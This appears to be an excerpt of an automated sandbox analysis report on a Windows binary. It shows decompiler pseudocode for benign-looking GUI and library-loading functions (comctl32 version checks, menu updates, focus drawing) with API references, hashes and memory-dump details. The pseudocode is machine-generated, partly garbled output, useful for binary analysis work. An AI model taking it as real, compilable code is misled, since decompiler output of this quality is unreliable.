                                                                        C-Code - Quality: 45%
                                                                        			E0046CC50(void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;

				_t51 = _t52;
				_t53 = _t52 + 0xffffffec;
				_v8 = 0;
				_push(_t51);
				_push(0x46cd28);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53;
				if( *0x496c98 != 0) {
					L6:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(0x46cd2f);
					return E00404348( &_v8);
				} else {
					E004043E0( &_v8, "comctl32.dll");
					_push( &_v12);
					_t24 = E004047F8(_v8);
					_t49 = _t24;
					_push(_t49);
					L00406AAC();
					_t40 = _t24;
					if(_t40 == 0) {
						goto L6;
					} else {
						_v16 = E00402754(_t40);
						_push(_t51);
						_push(0x46cd05);
						_push( *[fs:eax]);
						 *[fs:eax] = _t53;
						_push(_v16);
						_push(_t40);
						_t29 = _v12;
						_push(_t29);
						_push(_t49);
						L00406AA4();
						if(_t29 != 0) {
							_push( &_v24);
							_push( &_v20);
							_push("\\");
							_t35 = _v16;
							_push(_t35);
							L00406AB4();
							if(_t35 != 0) {
								 *0x496c98 =  *((intOrPtr*)(_v20 + 8));
							}
						}
						_pop(_t47);
						 *[fs:eax] = _t47;
						_push(0x46cd0c);
						return E00402774(_v16);
					}
				}
			}


















                                                                        0x0046cc51
                                                                        0x0046cc53
                                                                        0x0046cc5a
                                                                        0x0046cc5f
                                                                        0x0046cc60
                                                                        0x0046cc65
                                                                        0x0046cc68
                                                                        0x0046cc72
                                                                        0x0046cd0c
                                                                        0x0046cd14
                                                                        0x0046cd17
                                                                        0x0046cd1a
                                                                        0x0046cd27
                                                                        0x0046cc78
                                                                        0x0046cc80
                                                                        0x0046cc88
                                                                        0x0046cc8c
                                                                        0x0046cc91
                                                                        0x0046cc93
                                                                        0x0046cc94
                                                                        0x0046cc99
                                                                        0x0046cc9d
                                                                        0x00000000
                                                                        0x0046cc9f
                                                                        0x0046cca6
                                                                        0x0046ccab
                                                                        0x0046ccac
                                                                        0x0046ccb1
                                                                        0x0046ccb4
                                                                        0x0046ccba
                                                                        0x0046ccbb
                                                                        0x0046ccbc
                                                                        0x0046ccbf
                                                                        0x0046ccc0
                                                                        0x0046ccc1
                                                                        0x0046ccc8
                                                                        0x0046cccd
                                                                        0x0046ccd1
                                                                        0x0046ccd2
                                                                        0x0046ccd7
                                                                        0x0046ccda
                                                                        0x0046ccdb
                                                                        0x0046cce2
                                                                        0x0046ccea
                                                                        0x0046ccea
                                                                        0x0046cce2
                                                                        0x0046ccf1
                                                                        0x0046ccf4
                                                                        0x0046ccf7
                                                                        0x0046cd04
                                                                        0x0046cd04
                                                                        0x0046cc9d

                                                                        APIs
                                                                        • 739414E0.VERSION(00000000,?,00000000,0046CD28), ref: 0046CC94
                                                                        • 739414C0.VERSION(00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCC1
                                                                        • 73941500.VERSION(?,0046CD50,?,?,00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 739414$73941500
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 1696551078-431930879
                                                                        • Opcode ID: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction ID: 7ec7435803e1971a03311a5c6c3e11d69c247d37a00d9ae0bfaa4f5d1cfef9b6
                                                                        • Opcode Fuzzy Hash: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction Fuzzy Hash: 8D214F75600208AFDB01EFA9DC91DAE77FCEB49300B524477F944E3691E778AE008A69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424D94, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E00424D94(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E004035AC(1);
				_push(_t77);
				_push(0x424e1b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x41232c; // 0x412378
				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x496a44);
				L004068AC();
				_push(_t77);
				_push(0x424e7b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00423828( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00423824(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424E82);
				_push(0x496a44);
				L004069F4();
				return 0;
			}












                                                                        0x00424d95
                                                                        0x00424d97
                                                                        0x00424da1
                                                                        0x00424db0
                                                                        0x00424db5
                                                                        0x00424db6
                                                                        0x00424dbb
                                                                        0x00424dbe
                                                                        0x00424dc4
                                                                        0x00424dca
                                                                        0x00424ddd
                                                                        0x00424ddd
                                                                        0x00424de5
                                                                        0x00424def
                                                                        0x00424dfa
                                                                        0x00424dfa
                                                                        0x00424e00
                                                                        0x00424e0e
                                                                        0x00424e13
                                                                        0x00424e16
                                                                        0x00424e32
                                                                        0x00424e37
                                                                        0x00424e3e
                                                                        0x00424e3f
                                                                        0x00424e44
                                                                        0x00424e47
                                                                        0x00424e50
                                                                        0x00424e5b
                                                                        0x00424e5e
                                                                        0x00424e65
                                                                        0x00424e68
                                                                        0x00424e6b
                                                                        0x00424e70
                                                                        0x00424e75
                                                                        0x00424e7a

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: x#A$A
                                                                        • API String ID: 3168844106-3646173994
                                                                        • Opcode ID: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction ID: 96df8752f16c2a0022fc4abf683c0cece092d4dd73ebd9113d8584cb1a2c50fe
                                                                        • Opcode Fuzzy Hash: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction Fuzzy Hash: FC217175A04304AFDB11DF69D88184ABBF5FB89720B5285AAF804A7761C678EE40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00449AD8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E00449AD8(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x495c50; // 0x4967f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00449E5C(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) + ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                        0x00449ada
                                                                        0x00449add
                                                                        0x00449adf
                                                                        0x00449ae8
                                                                        0x00449aff
                                                                        0x00449b01
                                                                        0x00449b08
                                                                        0x00449b14
                                                                        0x00449b18
                                                                        0x00449b26
                                                                        0x00449b2d
                                                                        0x00449b31
                                                                        0x00449b43
                                                                        0x00449b48
                                                                        0x00449b66
                                                                        0x00449b6a
                                                                        0x00449b78
                                                                        0x00449b7f
                                                                        0x00000000
                                                                        0x00449b85
                                                                        0x00449b7f
                                                                        0x00449b48
                                                                        0x00449b2d
                                                                        0x00449b92

                                                                        APIs
                                                                        • GetMenuItemInfoA.USER32 ref: 00449B26
                                                                        • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00449B78
                                                                        • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00449B85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw
                                                                        • String ID: P
                                                                        • API String ID: 3227129158-3110715001
                                                                        • Opcode ID: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction ID: df4e8d69c2b8ab43fa3eab23de6c9c49e1d9bdfb9557a38750246fd9a3c36f3e
                                                                        • Opcode Fuzzy Hash: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction Fuzzy Hash: 5C116A30605A006BE310DB29CC81B4B7BD5EF8A364F14866AF094DB3D5D779DC859B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E42C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043E42C(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x43e6e8
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x43e6e8
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x43e6e8
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                                        0x0043e434
                                                                        0x0043e436
                                                                        0x0043e436
                                                                        0x0043e439
                                                                        0x0043e43c
                                                                        0x0043e43f
                                                                        0x0043e444
                                                                        0x0043e44e
                                                                        0x0043e453
                                                                        0x0043e459
                                                                        0x0043e45e
                                                                        0x0043e461
                                                                        0x0043e469

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClientRectScreenWindow
                                                                        • String ID: C$C
                                                                        • API String ID: 3371951266-238425240
                                                                        • Opcode ID: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction ID: 1f4564615450670a25db1ca0009ad4615392a475f3aeb3dbd1faee911e03ac16
                                                                        • Opcode Fuzzy Hash: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction Fuzzy Hash: D2F0A2B190120DAFCB00DFE9D9818DEFBFCEF08210F10416AA945E3341D631AA508BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B418, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040B418() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x47a0e4 = _t1;
				}
				if( *0x47a0e4 == 0) {
					 *0x47a0e4 = E00408B84;
					return E00408B84;
				}
				return _t1;
			}





                                                                        0x0040b41e
                                                                        0x0040b423
                                                                        0x0040b427
                                                                        0x0040b42f
                                                                        0x0040b434
                                                                        0x0040b434
                                                                        0x0040b440
                                                                        0x0040b447
                                                                        0x00000000
                                                                        0x0040b447
                                                                        0x0040b44d

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0F1,00000000,0040C104), ref: 0040B41E
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B42F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction ID: 6ae0bcb979b928d375a13ebc24deeef97ab0339ec59b2135f7a36ef93f1d17aa
                                                                        • Opcode Fuzzy Hash: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction Fuzzy Hash: 64D05EA020538A8ADB00FFB059C17153594C340708B04843BA106752D3C7BE49A0978E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004269FC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004269FC() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x496a94 == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x496a94 = _t1;
					if( *0x496a94 != 0) {
						_t2 =  *0x496a94; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x496a98 = _t3;
						return _t3;
					}
				}
				return _t1;
			}






                                                                        0x00426a03
                                                                        0x00426a0a
                                                                        0x00426a0f
                                                                        0x00426a1b
                                                                        0x00426a22
                                                                        0x00426a28
                                                                        0x00426a2d
                                                                        0x00000000
                                                                        0x00426a2d
                                                                        0x00426a1b
                                                                        0x00426a32

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(comctl32.dll,00426A6D,00000200,0046CC12), ref: 00426A0A
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00426A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 1646373207-802336580
                                                                        • Opcode ID: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction ID: b485c5e37fb782eca6cace4d01e2d249d426e4b814a2065c8112e2717f591e71
                                                                        • Opcode Fuzzy Hash: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction Fuzzy Hash: 70D09EB06412529FE700EFA4BD467117790D323705FA3C43BA04976DB1D67C2454C70C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00464658, Relevance: 6.2, APIs: 4, Instructions: 225windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E00464658(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00461DEC( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E004641C0( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E0042062C( *((intOrPtr*)( *_t212 + 0x208)));
					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E0042056C(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041FC50( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041F464( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E004627C4(_v36);
					_v38 = E00461ED8(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043CC2C( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00464838))) {
							case 0:
								E00464230(_t213);
								goto L22;
							case 1:
								__eax = E0046443C(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E0046438C(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E00464280(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E004644EC(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00464574(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x464948; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043CC2C( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x464944; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x464940; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}



































                                                                        0x00464658
                                                                        0x00464667
                                                                        0x00464668
                                                                        0x00464669
                                                                        0x0046466a
                                                                        0x0046466b
                                                                        0x0046466e
                                                                        0x00464671
                                                                        0x0046467c
                                                                        0x00464681
                                                                        0x00464685
                                                                        0x00464697
                                                                        0x00000000
                                                                        0x004646a1
                                                                        0x004646ab
                                                                        0x004646ad
                                                                        0x004646b4
                                                                        0x00464778
                                                                        0x00464778
                                                                        0x00464785
                                                                        0x00464790
                                                                        0x00464790
                                                                        0x00464796
                                                                        0x00464798
                                                                        0x0046479a
                                                                        0x0046479a
                                                                        0x0046479d
                                                                        0x004647a2
                                                                        0x004647af
                                                                        0x004647bc
                                                                        0x004647c6
                                                                        0x004647d9
                                                                        0x004647e4
                                                                        0x004647e7
                                                                        0x004647f1
                                                                        0x004647fe
                                                                        0x004647fe
                                                                        0x00464809
                                                                        0x00464814
                                                                        0x0046481f
                                                                        0x00464825
                                                                        0x0046482c
                                                                        0x0046482f
                                                                        0x00464884
                                                                        0x00464886
                                                                        0x0046488c
                                                                        0x0046488f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464895
                                                                        0x00464898
                                                                        0x0046489c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004648a4
                                                                        0x004648b6
                                                                        0x004648b9
                                                                        0x004648bb
                                                                        0x004648c2
                                                                        0x004648c7
                                                                        0x004648ca
                                                                        0x004648cc
                                                                        0x004648d3
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d5
                                                                        0x004648d3
                                                                        0x004648da
                                                                        0x004648e0
                                                                        0x004648e2
                                                                        0x004648e4
                                                                        0x004648e6
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648f0
                                                                        0x004648e6
                                                                        0x004648f3
                                                                        0x004648f5
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x004648ff
                                                                        0x00464904
                                                                        0x0046490b
                                                                        0x00464910
                                                                        0x00464912
                                                                        0x00000000
                                                                        0x00464914
                                                                        0x00464914
                                                                        0x00464916
                                                                        0x0046491d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464931
                                                                        0x00464831
                                                                        0x00464831
                                                                        0x00000000
                                                                        0x00464851
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046485a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046486c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464863
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464875
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046487e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464831
                                                                        0x004646ba
                                                                        0x004646ba
                                                                        0x004646bc
                                                                        0x004646c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004646ca
                                                                        0x004646d2
                                                                        0x004646d5
                                                                        0x00464759
                                                                        0x00000000
                                                                        0x0046476d
                                                                        0x004646d9
                                                                        0x004646e0
                                                                        0x004646e5
                                                                        0x004646e7
                                                                        0x00464736
                                                                        0x00000000
                                                                        0x0046474a
                                                                        0x004646ed
                                                                        0x00464701
                                                                        0x00464707
                                                                        0x00464709
                                                                        0x00464710
                                                                        0x0046493c
